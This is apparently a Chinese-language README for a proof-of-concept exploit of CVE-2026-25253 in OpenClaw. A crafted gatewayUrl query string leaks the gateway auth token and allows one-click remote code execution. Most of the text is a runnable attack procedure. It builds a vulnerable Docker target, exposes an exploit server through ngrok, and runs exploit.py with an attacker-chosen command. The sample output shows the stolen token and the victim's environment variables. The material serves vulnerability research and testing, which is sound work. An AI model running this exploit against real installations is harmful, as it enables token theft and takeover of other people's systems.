
★ CVE-2026-25253 OpenClaw 一键远程代码执行 PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253:OpenClaw 认证令牌泄露漏洞
OpenClaw(又称 clawdbot 或 Moltbot)在 v2026.1.29 之前,攻击者可通过向 Control UI 提供精心构造的 gatewayUrl 查询字符串值来窃取已存储的网关认证令牌,该界面会自动建立 WebSocket 连接,而无需验证或用户确认。这可能导致未授权的网关访问和一键远程代码执行。
Dockerfile — 构建 OpenClaw 漏洞环境templates/ — 漏洞利用所使用的恶意网页config.txt — 受害者环境中使用的 OpenClaw 配置exploit.py — 漏洞利用服务器requirements.txt — PoC 依赖docker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txt 的内容pip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
示例:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
我们每月发布一次 CVE 和恶意软件分析。如果您感兴趣,请通过以下链接查看我们的文章。